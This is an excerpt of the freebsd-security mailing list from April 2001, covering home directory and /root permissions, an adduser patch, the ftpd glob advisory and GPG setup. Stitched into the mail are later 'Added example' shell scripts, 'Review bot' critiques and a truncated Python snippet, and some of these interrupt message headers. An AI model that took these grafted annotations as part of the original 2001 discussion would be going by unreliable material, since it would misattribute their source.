I did this in case a bug in a CGI is causing problems. Unfortunately nothing seems to respect this limit. Since these crashes seem to be happening in the middle of the night I can't seem to catch the program that's eating the memory.

Any ideas?

-Michael
_________________________________________________________________
http://fastmail.ca/ - Fast Free Web Email for Canadians

From owner-freebsd-security Wed Apr 18 5: 7:23 2001
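The login.conf pitfall Michael describes above (whitespace after a continuation backslash ends the class record early, and every cap after it is silently dropped) can be checked for before it costs a night of crashes. This is an added example, not code from the thread; it writes its own constructed login.conf fragment to a temporary file rather than touching /etc/login.conf, and it only models the continuation rule, not the full cap(3) syntax.

```shell
#!/bin/sh
# Added example (not from the thread): spot login.conf continuation lines whose
# backslash is followed by trailing whitespace.  A getcap(3)-style reader only
# continues a record when "\" is the very last character of the line, so a
# "\ " quietly terminates the record and the remaining caps never apply.

# find_broken_continuations FILE
# Prints "lineno:text" for each line ending in a backslash plus whitespace.
# Exit status 0 when the file is clean, 1 when at least one such line exists.
find_broken_continuations() {
    awk '
        /\\[ \t]+$/ { printf "%d:%s\n", NR, $0; bad = 1 }
        END { exit bad ? 1 : 0 }
    ' "$1"
}

# join_entry FILE CLASS
# Reassemble one class record the way the reader sees it: lines are glued
# together only while they end in a bare backslash.  Printing the effective
# record makes a truncated one obvious by what it lacks.
join_entry() {
    awk -v class="$2" '
        /^[ \t]*#/ { next }                      # skip comment lines
        /^[ \t]*$/ { next }                      # skip blank lines
        !inentry && $0 ~ ("^" class ":") { inentry = 1 }
        inentry {
            line = $0
            sub(/^[ \t]+/, "", line)             # drop leading indentation
            if (line ~ /\\$/) {                  # bare backslash: continues
                sub(/\\$/, "", line)
                entry = entry line
            } else {                             # anything else ends the record
                print entry line
                exit
            }
        }
    ' "$1"
}

# write_sample FILE BROKEN
# Constructed sample: a daemon class with three caps.  When BROKEN is "yes",
# the datasize line carries a space after its backslash, so memoryuse and
# maxproc never reach the record.
write_sample() {
    if [ "$2" = yes ]; then bs='\ '; else bs='\'; fi
    printf 'daemon:\\\n\t:datasize=65536:%s\n\t:memoryuse=131072:\\\n\t:maxproc=64:\n' \
        "$bs" > "$1"
}

# Stand-alone demonstration on the broken and the corrected sample.
demo_login_conf_check() {
    f=$(mktemp) || return 1
    write_sample "$f" yes
    echo "broken file, record as parsed: $(join_entry "$f" daemon)"
    find_broken_continuations "$f" || echo "-> trailing whitespace after backslash on the line above"
    write_sample "$f" no
    echo "fixed file, record as parsed:  $(join_entry "$f" daemon)"
    rm -f "$f"
}

demo_login_conf_check
```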
From: Fernando Schapachnik
Message-Id: <200104181209.JAA64497@ns1.via-net-works.net.ar>
Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob (fwd)
In-Reply-To: <20010417171445.B4890@peitho.fxp.org> "from Chris Faulhaber at Apr 17, 2001 05:14:45 pm"
To: Chris Faulhaber
Date: Wed, 18 Apr 2001 09:09:41 -0300 (ART)
Cc: Fernando Schapachnik, security@freebsd.org, stable@freebsd.org
Reply-To: Fernando Schapachnik

In an earlier message, Chris Faulhaber wrote:
> > Where are GLOB_LIMIT and GLOB_MAXPATH supposed to be defined?
> >
>
> The advisory patch is missing the glob.h patch along with the
> instruction to copy the resulting glob.h to /usr/include.
>
> Quick fix is to either get the diff or entire file from
> http://www.FreeBSD.org/cgi/cvsweb.cgi/src/include/glob.h,
> copy the resulting file to /usr/include and build.

Obviously, it worked. Thanks!

Fernando P. Schapachnik
Network and technology planning
VIA NET.WORKS ARGENTINA S.A.
fschapachnik@vianetworks.com.ar
Tel.: (54-11) 4323-3381

From owner-freebsd-security Wed Apr 18 7:35: 0 2001
Date: Wed, 18 Apr 2001 17:39:27 +0300
From: Victor Ivanov
To: freebsd-security@freebsd.org
Subject: /root and users home dir permissions
Message-ID: <20010418173927.A64529@icon.icon.bg>

Hi all,

I noticed /root is installed with mode=0755 (and updated every time by installworld). It's the root home directory... some admins (like me) are using it for keeping sensitive data away from regular users. Shouldn't it be mode=0700 in /etc/mtree/BSD.root.dist?

Also, when adding new users their home directories should be protected the same way. Am I wrong?

--
Players win and winners play
Have a lucky day

From owner-freebsd-security Wed Apr 18 8:28:24 2001
Date: Wed, 18 Apr 2001 11:27:42 -0400 (EDT)
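One way to find out how exposed things already are on a given box, which is the question behind Victor's message above: list the home directories (and /root, if you point it there) whose group or other bits still grant read or search. This is an added example, not code from the thread; it takes the parent directory as an argument, relies only on ls(1) output so it behaves the same on FreeBSD and Linux, and builds a constructed scratch tree for its own demonstration.

```shell
#!/bin/sh
# Added example (not from the thread): report directories under a base
# directory (e.g. /home, or "/" to cover /root) that are readable or
# searchable by group or others, which is what a 0755 /root or a home
# directory created by adduser as 0755 looks like.

# dir_mode_string DIR  ->  the ten-character mode column of "ls -ld DIR"
dir_mode_string() {
    ls -ld "$1" | cut -c1-10
}

# list_open_homes BASEDIR
# Prints "<mode> <dir>" for every directory directly under BASEDIR that has
# any of the group/other r or x bits set.  Exit status 0 if all of them are
# private (0700-style), 1 if at least one is exposed.
list_open_homes() {
    open_found=0
    for dir in "$1"/*/; do
        [ -d "$dir" ] || continue
        dir=${dir%/}
        mode=$(dir_mode_string "$dir")
        # characters 5-10 are the group and other permission triplets
        case $(printf '%s' "$mode" | cut -c5-10) in
            *r*|*x*) printf '%s %s\n' "$mode" "$dir"; open_found=1 ;;
        esac
    done
    return $open_found
}

# make_sample_tree BASEDIR
# Constructed demonstration tree: one private home, one created the way the
# thread describes (0755), and a 0750 one that is still group-readable.
make_sample_tree() {
    mkdir -m 0700 "$1/alice"
    mkdir -m 0755 "$1/bob"
    mkdir -m 0750 "$1/carol"
}

# Stand-alone demonstration on the constructed tree.
demo_home_audit() {
    base=$(mktemp -d) || return 1
    make_sample_tree "$base"
    echo "exposed home directories under $base:"
    list_open_homes "$base" || echo "-> chmod go-rwx on the above would close them"
    rm -rf "$base"
}

demo_home_audit
```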
From: Mikhail Kruk
To: Victor Ivanov
Subject: Re: /root and users home dir permissions
In-Reply-To: <20010418173927.A64529@icon.icon.bg>

> Hi all,
>
> I noticed /root is installed with mode=0755 (and updated every time by
> installworld). It's the root home directory... some admins (like me) are
> using it for keeping sensitive data away from regular users. Shouldn't it
> be mode=0700 in /etc/mtree/BSD.root.dist?

I don't think changes like this can be made all of a sudden. Some people might be using /root for something which requires it to be readable and we don't want to break things...

> Also, when adding new users their home directories should be protected the
> same way. Am I wrong?

I strongly agree with that. This change seems to be ok in terms of breaking existing systems and people have no business in other users' directories.

From owner-freebsd-security Wed Apr 18 8:38:38 2001
Date: Wed, 18 Apr 2001 17:38:24 +0200 (CEST)
From: Attila Nagy
To: Mikhail Kruk
Cc: Victor Ivanov
Subject: Re: /root and users home dir permissions
Message-ID: <20010418173737.H50883-100000@scribble.fsn.hu>

Hello,

> > Also, when adding new users their home directories should be protected the
> > same way. Am I wrong?
> I strongly agree with that. This change seems to be ok in terms of
> breaking existing systems and people have no business in other users'
> directories.

I think sysinstall now has such a button, so this can be enabled during the install.

--------------------------------------------------------------------------
Attila Nagy                                   e-mail: Attila.Nagy@fsn.hu
Budapest Polytechnic (BMF.HU)                 @work: +361 210 1415 (194)
H-1084 Budapest, Tavaszmezo u. 15-17.         cell.: +3630 306 6758

From owner-freebsd-security Wed Apr 18 8:47:52 2001
Message-ID: <3ADDB725.56C1BE83@ursine.com>
Date: Wed, 18 Apr 2001 08:47:49 -0700
From: Michael Bryan
To: freebsd-security@FreeBSD.ORG
Subject: Re: Latency of security notifications
References: <200104180245.f3I2jtT17721@drugs.dv.isc.org>

Mark.Andrews@nominum.com wrote:
> Michael Bryan wrote:
> > The FreeBSD security team has been notified of a problem
> > with XYZ. An official security announcement will be forthcoming
> > shortly with the recommended fixes. In the meantime, please
> > subscribe to and read the freebsd-security mailing list for the
> > latest news on this issue.
>
> This approach doesn't work. I was not on the freebsd-security
> list when the ntpd bugtraq message went out. I found it
> impossible to see the *recent* traffic on the list that I
> had missed.
>
> This is not to say that it can't be made to work. Just that
> we are not at a stage were this is the correct response.

Does this address your concern? I see all recent list traffic here, including your message:

http://docs.freebsd.org/mail/current/freebsd-security.html

The "early alert" message could easily include that URL, which would help people find any recent discussion missed before subscribing. (Or just view via the web interface without even subscribing.)
Mail from previous weeks can be found here:

http://docs.freebsd.org/mail/archive/2001/freebsd-security/

From owner-freebsd-security Wed Apr 18 9:31: 5 2001
Date: Wed, 18 Apr 2001 18:31:21 +0200
From: "Karsten W. Rohrbach"
To: James Greenfield
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: GPG and "Not enough random bytes available"
Message-ID: <20010418183121.D8026@mail.webmonster.de>
References: <026a01c0c780$e4ab3260$4501a8c0@boubou>
In-Reply-To: <026a01c0c780$e4ab3260$4501a8c0@boubou>; from james@pagearts.co.za on Tue, Apr 17, 2001 at 10:56:36PM +0200

Insert the following into ~/.gnupg/options:

    load-extension rndunix

Then it won't ask you any questions. I do not know the implications for the quality of the random data generated; could somebody deeper into GnuPG's intrinsics please comment on this?

/k

James Greenfield(james@pagearts.co.za)@2001.04.17 22:56:36 +0000:
> ----------------------------------------- (on router.pagearts.co.za)
>
> Mail scanned with Trend Antivirus Interscan Viruswall
>
> ---------------------------------------------------------
> I've just installed GPG 1.0.4 on FreeBSD 4.2-RELEASE.
>
> Any attempt to generate a keypair results in a message to the effect of "Not
> enough random bytes available". Regardless of how much work I make the
> system do it doesn't seem to do anything more, GPG just sits there with a
> blank expression on its face.
>
> Some searches on the Web seem to indicate a possible patch to clock.c that
> may be the cause of this problem? What's of some concern to me is that all
> the threads around this issue seem to indicate that it should require no
> more than about 24 bytes of random data, but the message displayed indicates
> that 300 bytes more are required. This seems like an awful lot of random
> data.
>
> The messages above also seemed to indicate that a reboot may result in
> enough random data for a couple of email messages, but that seems pretty
> drastic.
>
> I realise that there are probably better places to search for this info, but
> I'm just getting into FreeBSD again and this is the first time I've been in
> a position where I can actively maintain a server that's online (admittedly
> not a particularly high profile one, but we've had a couple of people poking
> around already, nothing like learning on the job :)
>
> Regards
> James Greenfield

--
> Hugh Hefner is a virgin.
KR433/KR11-RIPE -- http://www.webmonster.de -- ftp://ftp.webmonster.de
[Key] [KeyID---] [Created-] [Fingerprint-------------------------------------]
GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46

From owner-freebsd-security Wed Apr 18 10: 3:46 2001
Date: Wed, 18 Apr 2001 20:02:06 +0300
From: Peter Pentchev
To: Mikhail Kruk
Cc: Victor Ivanov, freebsd-security@FreeBSD.ORG
Subject: Re: /root and users home dir permissions
Message-ID: <20010418200206.C582@ringworld.oblivion.bg>
References: <20010418173927.A64529@icon.icon.bg>
In-Reply-To: ; from meshko@cs.brandeis.edu on Wed, Apr 18, 2001 at 11:27:42AM -0400

CC'd to -arch, although I guess most of the people interested are already on -security anyway..

On Wed, Apr 18, 2001 at 11:27:42AM -0400, Mikhail Kruk wrote:
> > Hi all,
> >
> > I noticed /root is installed with mode=0755 (and updated every time by
> > installworld). It's the root home directory... some admins (like me) are
> > using it for keeping sensitive data away from regular users. Shouldn't it
> > be mode=0700 in /etc/mtree/BSD.root.dist?
>
> I don't think changes like this can be made all of a sudden. Some people
> might be using /root for something which requires it to be readable and we
> don't want to break things...
>
> > Also, when adding new users their home directories should be protected the
> > same way. Am I wrong?
>
> I strongly agree with that. This change seems to be ok in terms of
> breaking existing systems and people have no business in other users'
> directories.

OK, I think Victor shall cede the /root case - after all, we're all free to make local mods to the mtree files and all, right? :)

About adduser.. what do people think about the attached patch? Or should that ugly regexp also check for numeric modes?

G'luck,
Peter

--
This sentence contains exactly threee erors.
Index: src/usr.sbin/adduser/adduser.perl =================================================================== RCS file: /home/ncvs/src/usr.sbin/adduser/adduser.perl,v retrieving revision 1.45 diff -u -r1.45 adduser.perl --- src/usr.sbin/adduser/adduser.perl 2001/04/17 09:42:07 1.45 +++ src/usr.sbin/adduser/adduser.perl 2001/04/18 16:59:19 @@ -39,6 +39,7 @@ $config_read = 1; # read config file $logfile = "/var/log/adduser"; # logfile $home = "/home"; # default HOME + $home_perm = "u+wrX,go-w"; # default permissions on HOME $etc_shells = "/etc/shells"; $etc_passwd = "/etc/master.passwd"; $group = "/etc/group"; @@ -219,6 +220,33 @@ return 0; } +# return the default permissions' string for HOME +sub home_permissions { + local($perm) = @_; + local($p) = $perm; + + return $p if !$verbose && $p eq &home_permissions_valid($p); + + while(1) { + $p = &confirm_list("Enter your default HOME permissions:", 1, $perm, ""); + last if $p eq &home_permissions_valid($p); + } + + $changes++ if $p ne $perm; + return $p; +} + +# check for valid permissions +sub home_permissions_valid { + local($perm) = @_; + + if ($perm =~ /^((([ugo]+[+-][rwxX]+),?)+)/) { + return $1; + } else { + return ""; + } +} + # check for valid passwddb sub passwd_check { system("$pwd_mkdb -C $etc_passwd"); @@ -939,16 +967,17 @@ if (!mkdir("$homedir", 0755)) { warn "$dir: $!\n"; return 0; } - system 'chown', "$name:$group", $homedir; + system("chmod", "$home_perm", "$homedir"); + system("chown", "$name:$group", "$homedir"); return !$?; } # copy files from $dotdir to $homedir # rename 'dot.foo' files to '.foo' print "Copy files from $dotdir to $homedir\n" if $verbose; - system("cp -R $dotdir $homedir"); - system("chmod -R u+wrX,go-w $homedir"); - system("chown -R $name:$group $homedir"); + system("cp", "-R", "$dotdir", "$homedir"); + system("chmod", "-R", "$home_perm", "$homedir"); + system("chown", "-R", "$name:$group", "$homedir"); # security opendir(D, $homedir); 
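Review bot: the default `$home_perm = "u+wrX,go-w";` added in the `@@ -39,6 +39,7 @@` hunk leaves new home directories world-readable and searchable, because `mkdir` still creates them 0755 and this spec only strips group/other write, so the patch as posted does not deliver the closed-home-directory behaviour the thread is asking for unless the admin edits the config. Consider a default such as `u=rwX,go=` (or `u=rwX,go=x` for the ~user web-server case raised later), and document the new `home_perm` knob alongside the other adduser.conf settings; this hunk adds the variable but no documentation.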
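Review bot: `home_permissions_valid` in the `@@ -219,6 +220,33 @@` hunk accepts a trailing comma: for `u+rwX,` the `,?` inside the group swallows the comma, `$1` equals the whole input, `home_permissions` takes it as valid, and chmod(1) later rejects it. The pattern also refuses specs chmod accepts (`a`, `=`, an empty right-hand side such as `go=`) and, as the cover note itself asks, octal modes. Anchor the match and make the comma a separator, e.g. `/^[ugoa]+[+\-=][rwxX]*(,[ugoa]+[+\-=][rwxX]*)*$/`, and accept `/^[0-7]{3,4}$/` alongside it; if octal is accepted, the `chmod -R` in the later hunk needs thought, since `chmod -R 700` strips execute bits from every file copied out of `$dotdir`, which the symbolic `X` does not.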
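Review bot: in the `@@ -939,16 +967,17 @@` hunk the status of the new `system("chmod", "$home_perm", "$homedir")` is lost, because `return !$?` only reflects the `chown` that runs after it, so a chmod failure (for instance from a bad `$home_perm`) leaves the directory at the 0755 that `mkdir` created while the function reports success. Check `$?` after the chmod (or run chown first and combine both statuses), and since the aim is a closed directory, create it with `mkdir("$homedir", 0700)` and widen it with chmod rather than creating it 0755 and narrowing it afterwards. Moving `cp`, `chmod` and `chown` to the list form of `system` is a good change in the same hunk: it stops `$dotdir` and `$homedir` from being interpreted by the shell.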
@@ -1332,6 +1361,9 @@ # default HOME directory ("/home") home = "$home" +# default permissions on HOME ("u+wrX,go-w") +home_perm = "$home_perm"; + # List of directories where shells located # path = ('/bin', '/usr/bin', '/usr/local/bin') path = ($shpath) @@ -1391,6 +1423,7 @@ &shells_add; # maybe add some new shells $defaultshell = &shell_default; # enter default shell $home = &home_partition($home); # find HOME partition +$home_perm = &home_permissions($home_perm); # set HOME permissions $dotdir = &dotdir_default; # check $dotdir $send_message = &message_default; # send message to new user $defaultpasswd = &password_default; # maybe use password To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 10: 6:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id DD55E37B424 for ; Wed, 18 Apr 2001 10:06:21 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 1539 invoked by uid 1000); 18 Apr 2001 17:04:49 -0000 Date: Wed, 18 Apr 2001 20:04:49 +0300 
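Review bot: the config template line `home_perm = "$home_perm";` in the `@@ -1332,6 +1361,9 @@` hunk ends with a semicolon while the neighbouring entries (`home = "$home"`, `path = ($shpath)`) do not; if the config reader takes the rest of the line as the value, the semicolon becomes part of the permission string and `home_permissions_valid` rejects it on the next run. Drop the semicolon to match the surrounding lines.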
From: Peter Pentchev To: Mikhail Kruk Cc: Victor Ivanov , freebsd-security@FreeBSD.org, freebsd-arch@FreeBSD.org Subject: Re: /root and users home dir permissions Message-ID: <20010418200449.D582@ringworld.oblivion.bg> Mail-Followup-To: Mikhail Kruk , Victor Ivanov , freebsd-security@FreeBSD.org, freebsd-arch@FreeBSD.org References: <20010418173927.A64529@icon.icon.bg> <20010418200206.C582@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010418200206.C582@ringworld.oblivion.bg>; from roam@orbitel.bg on Wed, Apr 18, 2001 at 08:02:06PM +0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Well, so I forgot to CC it to -arch :) So here we go again :) G'luck, Peter -- When you are not looking at it, this sentence is in Spanish. On Wed, Apr 18, 2001 at 08:02:06PM +0300, Peter Pentchev wrote: > CC'd to -arch, although I guess most of the people interested are > already on -security anyway.. > > On Wed, Apr 18, 2001 at 11:27:42AM -0400, Mikhail Kruk wrote: > > > Hi all, > > > > > > I noticed /root is installed with mode=0755 (and updated every time by > > > installworld). It's the root home directory... some admins (like me) are > > > using it for keeping sensitive data away from regular users. Shouldn't it > > > be mode=0700 in /etc/mtree/BSD.root.dist? > > > > I don't think changes like this can be made all of a sudden. Some people > > might be using /root for something which requires it to be readable and we > > don't want to break things... > > > > > Also, when adding new users their home directories should be protected the > > > same way. Am I wrong? > > > > I strongly agree with that. This change seems to be ok in terms of > > breaking existing systems and people have no business in other users' > > directories. 
> > OK, I think Victor shall cede the /root case - after all, we're all free > to make local mods to the mtree files and all, right? :) > > About adduser.. what do people think about the attached patch? > Or should that ugly regexp also check for numeric modes? Index: src/usr.sbin/adduser/adduser.perl =================================================================== RCS file: /home/ncvs/src/usr.sbin/adduser/adduser.perl,v retrieving revision 1.45 diff -u -r1.45 adduser.perl --- src/usr.sbin/adduser/adduser.perl 2001/04/17 09:42:07 1.45 +++ src/usr.sbin/adduser/adduser.perl 2001/04/18 16:59:19 @@ -39,6 +39,7 @@ $config_read = 1; # read config file $logfile = "/var/log/adduser"; # logfile $home = "/home"; # default HOME + $home_perm = "u+wrX,go-w"; # default permissions on HOME $etc_shells = "/etc/shells"; $etc_passwd = "/etc/master.passwd"; $group = "/etc/group"; @@ -219,6 +220,33 @@ return 0; } +# return the default permissions' string for HOME +sub home_permissions { + local($perm) = @_; + local($p) = $perm; + + return $p if !$verbose && $p eq &home_permissions_valid($p); + + while(1) { + $p = &confirm_list("Enter your default HOME permissions:", 1, $perm, ""); + last if $p eq &home_permissions_valid($p); + } + + $changes++ if $p ne $perm; + return $p; +} + +# check for valid permissions +sub home_permissions_valid { + local($perm) = @_; + + if ($perm =~ /^((([ugo]+[+-][rwxX]+),?)+)/) { + return $1; + } else { + return ""; + } +} + # check for valid passwddb sub passwd_check { system("$pwd_mkdb -C $etc_passwd"); 
@@ -939,16 +967,17 @@ if (!mkdir("$homedir", 0755)) { warn "$dir: $!\n"; return 0; } - system 'chown', "$name:$group", $homedir; + system("chmod", "$home_perm", "$homedir"); + system("chown", "$name:$group", "$homedir"); return !$?; } # copy files from $dotdir to $homedir # rename 'dot.foo' files to '.foo' print "Copy files from $dotdir to $homedir\n" if $verbose; - system("cp -R $dotdir $homedir"); - system("chmod -R u+wrX,go-w $homedir"); - system("chown -R $name:$group $homedir"); + system("cp", "-R", "$dotdir", "$homedir"); + system("chmod", "-R", "$home_perm", "$homedir"); + system("chown", "-R", "$name:$group", "$homedir"); # security opendir(D, $homedir); @@ -1332,6 +1361,9 @@ # default HOME directory ("/home") home = "$home" +# default permissions on HOME ("u+wrX,go-w") +home_perm = "$home_perm"; + # List of directories where shells located # path = ('/bin', '/usr/bin', '/usr/local/bin') path = ($shpath) @@ -1391,6 +1423,7 @@ &shells_add; # maybe add some new shells $defaultshell = &shell_default; # enter default shell $home = &home_partition($home); # find HOME partition +$home_perm = &home_permissions($home_perm); # set HOME permissions $dotdir = &dotdir_default; # check $dotdir $send_message = &message_default; # send message to new user $defaultpasswd = &password_default; # maybe use password To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 10:41:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from cody.jharris.com (cody.jharris.com [205.238.128.83]) by hub.freebsd.org (Postfix) with ESMTP id 7CB5337B422 for ; Wed, 18 Apr 2001 10:41:14 -0700 (PDT) (envelope-from nick@rogness.net) Received: from localhost (nick@localhost) by cody.jharris.com (8.11.1/8.9.3) with ESMTP id f3IIlaY82142; Wed, 18 Apr 2001 13:47:36 -0500 (CDT) (envelope-from nick@rogness.net) Date: Wed, 18 Apr 2001 13:47:36 -0500 (CDT) 
From: Nick Rogness X-Sender: nick@cody.jharris.com To: Mikhail Kruk Cc: Victor Ivanov , freebsd-security@FreeBSD.ORG Subject: Re: /root and users home dir permissions In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 18 Apr 2001, Mikhail Kruk wrote: > > Hi all, [snip] > > > Also, when adding new users their home directories should be > protected the > same way. Am I wrong? > What about webservers and ~$username access, a better mode for that may be 701 maybe? Of course, I could be wrong. Nick Rogness - Keep on Routing in a Free World... "FreeBSD: The Power to Serve!" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 10:45: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 0CB3937B423 for ; Wed, 18 Apr 2001 10:45:06 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 2042 invoked by uid 1000); 18 Apr 2001 17:43:32 -0000 Date: Wed, 18 Apr 2001 20:43:32 +0300 
From: Peter Pentchev To: Nick Rogness Cc: Mikhail Kruk , Victor Ivanov , freebsd-security@FreeBSD.ORG Subject: Re: /root and users home dir permissions Message-ID: <20010418204332.E582@ringworld.oblivion.bg> Mail-Followup-To: Nick Rogness , Mikhail Kruk , Victor Ivanov , freebsd-security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from nick@rogness.net on Wed, Apr 18, 2001 at 01:47:36PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Apr 18, 2001 at 01:47:36PM -0500, Nick Rogness wrote: > On Wed, 18 Apr 2001, Mikhail Kruk wrote: > > > > Hi all, > [snip] > > > > > Also, when adding new users their home directories should be > > protected the > same way. Am I wrong? > > > > What about webservers and ~$username access, a better mode for > that may be 701 maybe? Of course, I could be wrong. I personally like 751.. G'luck, Peter -- Nostalgia ain't what it used to be. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 11:26:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailhub.airlinksys.com (mailhub.airlinksys.com [216.70.12.6]) by hub.freebsd.org (Postfix) with ESMTP id 3626937B423 for ; Wed, 18 Apr 2001 11:26:30 -0700 (PDT) (envelope-from sjohn@airlinksys.com) Received: from sjohn.airlinksys.com (unknown [216.70.12.7]) by mailhub.airlinksys.com (Postfix) with ESMTP id 0FB6753501 for ; Wed, 18 Apr 2001 13:26:17 -0500 (CDT) Received: by sjohn.airlinksys.com (Postfix, from userid 1000) id DEE775DDA; Wed, 18 Apr 2001 13:26:15 -0500 (CDT) Date: Wed, 18 Apr 2001 13:26:15 -0500 
From: Scott Johnson To: freebsd-security@freebsd.org Subject: Re: PGP public keys Message-ID: <20010418132615.A11484@ns2.airlinksys.com> Reply-To: Scott Johnson Mail-Followup-To: freebsd-security@freebsd.org References: <01041813295506.00414@sentry.granch.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <01041813295506.00414@sentry.granch.com>; from shelton@sentry.granch.ru on Wed, Apr 18, 2001 at 01:29:55PM +0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Quoth Rashid N. Achilov on Wed, Apr 18, 2001 at 01:29:55PM +0700: > I have just installed GPG. As mirrored in doc, I put my public key on my web > page (rest is under construction :-)) ). But where can I find public keys for > people? Is there any keyserver? As mentioned by others, you can use pgp.mit.edu. If you put the line keyserver pgp.mit.edu in ~/.gnupg/options gpg can grab keys as needed. I use gpg with mutt, and gpg grabs public keys for signed messages automatically. -- Scott Johnson System/Network Administrator Airlink Systems To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 12:16: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id EB98737B423 for ; Wed, 18 Apr 2001 12:16:02 -0700 (PDT) (envelope-from Gerhard.Sittig@gmx.net) Received: (qmail 3322 invoked by uid 0); 18 Apr 2001 19:16:00 -0000 Received: from p3ee2160d.dip.t-dialin.net (HELO speedy.gsinet) (62.226.22.13) by mail.gmx.net (mp007-rz3) with SMTP; 18 Apr 2001 19:16:00 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id VAA10335 for freebsd-security@freebsd.org; Wed, 18 Apr 2001 21:04:25 +0200 Date: Wed, 18 Apr 2001 21:04:25 +0200 
From: Gerhard Sittig To: freebsd-security@freebsd.org Subject: Re: /root and users home dir permissions Message-ID: <20010418210425.S20830@speedy.gsinet> Mail-Followup-To: freebsd-security@freebsd.org References: <20010418173927.A64529@icon.icon.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <20010418173927.A64529@icon.icon.bg>; from v0rbiz@icon.bg on Wed, Apr 18, 2001 at 05:39:27PM +0300 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Apr 18, 2001 at 17:39 +0300, Victor Ivanov wrote: > > I noticed /root is installed with mode=0755 (and updated every > time by installworld). It's the root home directory... some > admins (like me) are using it for keeping sensitive data away > from regular users. Shouldn't it be mode=0700 in > /etc/mtree/BSD.root.dist? a+rx on /root only means that this very directory can be listed and entered by anybody. There might be valid reasons for doing this (dotfiles to derive from? config files in copied form which are of general interest? although I don't think root should have a public_html tree. But definitely some people feel that /root should be 0755 -- otherwise the mtree config file would look different:). What keeps you from putting sensitive data into a directory one level deeper? It's basically what you do as a regular user, too. You simply keep the secret stuff away while still allowing access to the public and non-sensitive stuff. > Also, when adding new users their home directories should be > protected the same way. Am I wrong? Yes. :) I've just been through it after moving to another server. People don't like getting stopped from looking at others' config skeletons and public data. And everyone quickly went to open up their $HOME. Maybe 711 would be more appropriate. 
Those who know where they want to go or which file they want to look at are free to do so (assuming the subdir or file is executable / readable). While those with no direction cannot list the content and look out for what could be of interest. But I'm afraid any configuration (completely closed, completely open, as well as between) will have opponents ... virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 13:38: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from smurftarget.net (netwarriors.org [216.34.142.180]) by hub.freebsd.org (Postfix) with ESMTP id 2A64037B424 for ; Wed, 18 Apr 2001 13:38:02 -0700 (PDT) (envelope-from loki@smurftarget.net) Received: from loki by smurftarget.net with local (Exim 3.20 #1) id 14pyhI-000JIi-00 for freebsd-security@freebsd.org; Wed, 18 Apr 2001 13:37:08 -0700 Date: Wed, 18 Apr 2001 13:37:08 -0700 
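The thread compares 0700, 0711, 0751 and adduser's symbolic `u+wrX,go-w` without spelling out what each one yields. The Python below is an added example, not code from the thread or from FreeBSD's adduser: it validates a mode spec, resolves it against a base mode the way chmod(1) does, and reports what group members and everyone else can do with the resulting home directory (list versus traverse, the distinction behind the ~user web-server case). It goes beyond the regexp in the posted patch by also accepting `a`, `=`, an empty right-hand side, and octal modes, as chmod does. The function names, the base mode of 0755, and the treatment of `X` (execute only for directories or already-executable files) are this example's own choices.

```python
import re

# A symbolic clause list as chmod(1) reads it: who[+-=]perms[,who[+-=]perms...]
# Accepts 'a' and '=' and an empty perms list, unlike the patch's regexp.
_CLAUSE = r"[ugoa]+[+\-=][rwxX]*"
SYMBOLIC_RE = re.compile(rf"^{_CLAUSE}(?:,{_CLAUSE})*$")
NUMERIC_RE = re.compile(r"^[0-7]{3,4}$")

_WHO_MASK = {"u": 0o700, "g": 0o070, "o": 0o007, "a": 0o777}
_PERM_BITS = {"r": 0o444, "w": 0o222, "x": 0o111}


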